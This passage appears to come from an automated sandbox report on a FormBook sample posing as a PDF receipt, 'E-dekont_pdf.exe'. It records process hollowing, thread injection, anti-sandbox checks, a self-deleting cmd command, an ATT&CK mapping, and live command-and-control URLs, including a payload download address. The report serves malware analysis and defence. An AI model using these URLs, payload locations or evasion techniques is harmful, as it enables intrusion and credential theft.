      Source: Yara matchFile source: Process Memory Space: E-dekont_pdf.exe PID: 1568, type: MEMORYSTR
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_05675759 push edi; ret 1_2_056758C5
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_05675909 push edi; ret 1_2_056758C5
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_056757FB push edi; ret 1_2_056758C5
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_05675FD6 push ds; retf 1_2_05675FD9
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_05674C71 push esp; ret 1_2_05674C72
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_056758A8 push edi; ret 1_2_056758C5
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_6F132351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6F132351
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeFile created: C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns\Recessionary31\Urbanologist\ThrottleGearXMLHelper.dllJump to dropped file
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dllJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xEF
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: E-dekont_pdf.exe, 00000001.00000002.77085989629.0000000000648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEXE^D
      Source: E-dekont_pdf.exe, 00000001.00000002.77085989629.0000000000696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: C:\Windows\explorer.exe TID: 10076Thread sleep count: 52 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 10076Thread sleep time: -104000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 9956Thread sleep count: 122 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 9956Thread sleep time: -244000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns\Recessionary31\Urbanologist\ThrottleGearXMLHelper.dllJump to dropped file
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 864Jump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeAPI call chain: ExitProcess graph end nodegraph_1-4667
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeAPI call chain: ExitProcess graph end nodegraph_1-4448
      Source: E-dekont_pdf.exe, 00000001.00000002.77204896221.000000000AF89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: E-dekont_pdf.exe, 00000001.00000002.77204896221.000000000AF89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: E-dekont_pdf.exe, 00000001.00000002.77204896221.000000000AF89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: E-dekont_pdf.exe, 00000001.00000002.77085989629.0000000000648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exexe^D
      Source: E-dekont_pdf.exe, 00000001.00000002.77204896221.000000000AF89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: E-dekont_pdf.exe, 00000001.00000002.77204896221.000000000AF89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: E-dekont_pdf.exe, 00000001.00000002.77204896221.000000000AF89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: E-dekont_pdf.exe, 00000001.00000002.77204896221.000000000AF89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: E-dekont_pdf.exe, 00000001.00000002.77204896221.000000000AF89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: E-dekont_pdf.exe, 00000001.00000002.77204896221.000000000AF89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: E-dekont_pdf.exe, 00000001.00000002.77085989629.0000000000696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: E-dekont_pdf.exe, 00000001.00000002.77204896221.000000000AF89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: E-dekont_pdf.exe, 00000001.00000002.77204896221.000000000AF89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_6F132351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6F132351
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.91 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.117.26.57 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 15.197.142.173 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.29.154.110 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 160.121.87.199 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 81.171.22.5 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.211 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 205.178.189.129 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 199.33.123.34 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 164.155.209.181 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 64.246.164.134 80Jump to behavior
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: CD0000Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeThread register set: target process: 4604Jump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 4604Jump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeProcess created: C:\Users\user\Desktop\E-dekont_pdf.exe C:\Users\user\Desktop\E-dekont_pdf.exeJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\E-dekont_pdf.exe"Jump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API      		1
      Windows Service      		1
      Access Token Manipulation      		1
      Rootkit      		1
      Credential API Hooking      		211
      Security Software Discovery      		Remote Services1
      Credential API Hooking      		Exfiltration Over Other Network Medium12
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Shared Modules      		1
      DLL Side-Loading      		1
      Windows Service      		1
      Masquerading      		LSASS Memory12
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Archive Collected Data      		Exfiltration Over Bluetooth3
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)511
      Process Injection      		12
      Virtualization/Sandbox Evasion      		Security Account Manager1
      Process Discovery      		SMB/Windows Admin Shares1
      Clipboard Data      		Automated Exfiltration3
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)1
      DLL Side-Loading      		1
      Access Token Manipulation      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer114
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script511
      Process Injection      		LSA Secrets3
      File and Directory Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Obfuscated Files or Information      		Cached Domain Credentials3
      System Information Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Software Packing      		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 847920 Sample: E-dekont_pdf.exe Startdate: 17/04/2023 Architecture: WINDOWS Score: 100 34 www.3ay82.xyz 2->34 36 www.tmcgroup.africa 2->36 38 25 other IPs or domains 2->38 56 Snort IDS alert for network traffic 2->56 58 Multi AV Scanner detection for domain / URL 2->58 60 Found malware configuration 2->60 64 9 other signatures 2->64 11 E-dekont_pdf.exe 2 36 2->11         started        signatures3 62 Performs DNS queries to domains with low reputation 34->62 process4 file5 30 C:\Users\user\...\ThrottleGearXMLHelper.dll, PE32+ 11->30 dropped 32 C:\Users\user\AppData\Local\...\System.dll, PE32 11->32 dropped 72 Tries to detect Any.run 11->72 15 E-dekont_pdf.exe 6 11->15         started        signatures6 process7 dnsIp8 46 34.138.169.8, 49851, 80 ATGS-MMD-ASUS United States 15->46 48 Modifies the context of a thread in another process (thread injection) 15->48 50 Tries to detect Any.run 15->50 52 Maps a DLL or memory area into another process 15->52 54 2 other signatures 15->54 19 explorer.exe 4 1 15->19 injected signatures9 process10 dnsIp11 40 www.hear-aid-92727.com 185.53.179.90, 49861, 49871, 49880 TEAMINTERNET-ASDE Germany 19->40 42 www.credit-cards-54889.com 185.53.179.91, 49872, 80 TEAMINTERNET-ASDE Germany 19->42 44 15 other IPs or domains 19->44 66 System process connects to network (likely due to code injection or exploit) 19->66 23 colorcpl.exe 19->23         started        signatures12 process13 signatures14 68 Modifies the context of a thread in another process (thread injection) 23->68 70 Maps a DLL or memory area into another process 23->70 26 cmd.exe 1 23->26         started        process15 process16 28 conhost.exe 26->28         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      E-dekont_pdf.exe16%VirustotalBrowse
      E-dekont_pdf.exe11%ReversingLabsWin32.Malware.Generic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll0%ReversingLabs
      C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns\Recessionary31\Urbanologist\ThrottleGearXMLHelper.dll0%ReversingLabs

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      5.2.explorer.exe.13f9f840.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      6.2.colorcpl.exe.56ef840.4.unpack100%AviraTR/Patched.Ren.GenDownload File
      6.2.colorcpl.exe.34bf7c8.1.unpack100%AviraTR/Patched.Ren.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      td-ccm-168-233.wixdns.net0%VirustotalBrowse
      www.hear-aid-92727.com7%VirustotalBrowse
      www.hotcoa.com1%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://www.textare.net/mi94/?7n-Lh=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&2dCtIp=8pAXjvKhwP0%Avira URL Cloudsafe
      http://www.hear-aid-92727.com/mi94/?7n-Lh=/g6iPkZMT+AzSmj4EvOYZViGf2+l/NC2EVsOgk6j6s7G3J7D5NbiJXA89lK55coRI4US&7nrLOp=h2JXJD100%Avira URL Cloudmalware
      http://www.lapalmaaccesible.com/mi94/?7n-Lh=4Tl7mkmR2hfQ9KBizErbd2os7QrtMSS1Xe9D2XLoGouUMWTPUZ0bimWLWeFNR5N6++45&7nrLOp=h2JXJD0%Avira URL Cloudsafe
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
      http://www.jenniferfalconerrealtor.com/mi94/?7n-Lh=r2OEULnHovTrNfOCpsXB+B/EQ9/SU+ZHOlmwsAm4HEL75U8ltjEZYIavfnqmba7EJm23&7nrLOp=h2JXJD0%Avira URL Cloudsafe
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
      http://www.crosswalkconsulting.co.uk/mi94/?7n-Lh=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&7nrLOp=h2JXJD0%Avira URL Cloudsafe
      http://www.anjin98.com/mi94/?7n-Lh=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX&7nrLOp=h2JXJD0%Avira URL Cloudsafe
      http://www.guesstheword.net/mi94/?7n-Lh=0CB5zMamgLSa2Qk9G/m2rdJQK8/LiOrSmHcqlOKoi6nqM+OhtDcAk7yr1mTtKwqhUShE&7nrLOp=h2JXJD0%Avira URL Cloudsafe
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
      http://www.herhustlenation.com/mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD0%Avira URL Cloudsafe
      http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin100%Avira URL Cloudmalware
      http://www.3ay82.xyz/mi94/?7n-Lh=CbCIRV58eRNndOWCI78oxDf6x1iSjx/hnwXmuLCBxTq8dPC8gRCwXJA+IeN3UgdkVb2H&7nrLOp=h2JXJD0%Avira URL Cloudsafe
      http://www.credit-cards-54889.com/mi94/?7n-Lh=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7nrLOp=h2JXJD0%Avira URL Cloudsafe
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      http://www.elatedfreedom.com/mi94/?7n-Lh=aUhQPVU+b+KmCO5n+t9BjzZYrvo3RulPNqdvt5v9fBahIfZoi9X6HoXk4Ou54UhVLO4i&7nrLOp=h2JXJD0%Avira URL Cloudsafe
      http://www.hunterboots--canada.com/mi94/?2dCtIp=8pAXjvKhwP&7n-Lh=DPf7iOV4tZbGC7wAZwygpODOxt/Orl+HPYO0G2nQwomd4kRyfSlRFlrSB1ttg/LMfS7c0%Avira URL Cloudsafe
      http://www.hotcoa.com/mi94/?7n-Lh=tEvJTIrtwEr1z3msC1pTUGnOTVGGiUUymk4IsDmqK+5oX++y4YqyxgOU0GtdL5bqNLwd&7nrLOp=h2JXJD0%Avira URL Cloudsafe
      www.crosswalkconsulting.co.uk/mi94/0%Avira URL Cloudsafe
      http://www.sneakersuomo.com/mi94/?7n-Lh=6B2qrP5xTIPXUhljWLKFvclCy31c2DfKa32CVCvYSfVUhLKBGq8rlAeXXt8b11SpmRrr&7nrLOp=h2JXJD0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      td-ccm-168-233.wixdns.net
      		34.117.168.233
      		truetrueunknown
      www.hunterboots--canada.com
      		199.33.123.34
      		truetrue
        		unknown
        www.furniture-61686.com
        		185.53.179.90
        		truetrue
          		unknown
          www.hotcoa.com
          		81.171.22.5
          		truetrueunknown
          www.hear-aid-92727.com
          		185.53.179.90
          		truetrueunknown
          parkingpage.namecheap.com
          		198.54.117.211
          		truefalse
            		high
            shops.myshopify.com
            		23.227.38.74
            		truetrue
              		unknown
              www.sneakersuomo.com
              		188.114.96.3
              		truetrue
                		unknown
                elatedfreedom.com
                		34.102.136.180
                		truefalse
                  		unknown
                  www.anjin98.com
                  		160.121.87.199
                  		truetrue
                    		unknown
                    lb-agent-dugout-pr.moxiworks.com
                    		64.246.164.134
                    		truefalse
                      		high
                      www.3ay82.xyz
                      		34.117.26.57
                      		truetrue
                        		unknown
                        healthinsurancearena.com
                        		66.29.154.110
                        		truetrue
                          		unknown
                          www.guesstheword.net
                          		164.155.209.181
                          		truetrue
                            		unknown
                            www.herhustlenation.com
                            		205.178.189.129
                            		truetrue
                              		unknown
                              www.credit-cards-54889.com
                              		185.53.179.91
                              		truetrue
                                		unknown
                                canadianbreederprogram.com
                                		15.197.142.173
                                		truetrue
                                  		unknown
                                  www.healthinsurancearena.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.elatedfreedom.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.jenniferfalconerrealtor.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.lapalmaaccesible.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.textare.net
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.canadianbreederprogram.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.crosswalkconsulting.co.uk
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.tmcgroup.africa
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.lapalmaaccesible.com/mi94/?7n-Lh=4Tl7mkmR2hfQ9KBizErbd2os7QrtMSS1Xe9D2XLoGouUMWTPUZ0bimWLWeFNR5N6++45&7nrLOp=h2JXJDtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.guesstheword.net/mi94/?7n-Lh=0CB5zMamgLSa2Qk9G/m2rdJQK8/LiOrSmHcqlOKoi6nqM+OhtDcAk7yr1mTtKwqhUShE&7nrLOp=h2JXJDtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.crosswalkconsulting.co.uk/mi94/?7n-Lh=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&7nrLOp=h2JXJDtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.anjin98.com/mi94/?7n-Lh=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX&7nrLOp=h2JXJDtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.jenniferfalconerrealtor.com/mi94/?7n-Lh=r2OEULnHovTrNfOCpsXB+B/EQ9/SU+ZHOlmwsAm4HEL75U8ltjEZYIavfnqmba7EJm23&7nrLOp=h2JXJDtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.textare.net/mi94/?7n-Lh=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&2dCtIp=8pAXjvKhwPtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.hear-aid-92727.com/mi94/?7n-Lh=/g6iPkZMT+AzSmj4EvOYZViGf2+l/NC2EVsOgk6j6s7G3J7D5NbiJXA89lK55coRI4US&7nrLOp=h2JXJDtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.3ay82.xyz/mi94/?7n-Lh=CbCIRV58eRNndOWCI78oxDf6x1iSjx/hnwXmuLCBxTq8dPC8gRCwXJA+IeN3UgdkVb2H&7nrLOp=h2JXJDtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.herhustlenation.com/mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJDtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bintrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.credit-cards-54889.com/mi94/?7n-Lh=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7nrLOp=h2JXJDtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.elatedfreedom.com/mi94/?7n-Lh=aUhQPVU+b+KmCO5n+t9BjzZYrvo3RulPNqdvt5v9fBahIfZoi9X6HoXk4Ou54UhVLO4i&7nrLOp=h2JXJDfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.hotcoa.com/mi94/?7n-Lh=tEvJTIrtwEr1z3msC1pTUGnOTVGGiUUymk4IsDmqK+5oX++y4YqyxgOU0GtdL5bqNLwd&7nrLOp=h2JXJDtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.hunterboots--canada.com/mi94/?2dCtIp=8pAXjvKhwP&7n-Lh=DPf7iOV4tZbGC7wAZwygpODOxt/Orl+HPYO0G2nQwomd4kRyfSlRFlrSB1ttg/LMfS7ctrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  www.crosswalkconsulting.co.uk/mi94/true
                                                  • Avira URL Cloud: safe
                                                  		low
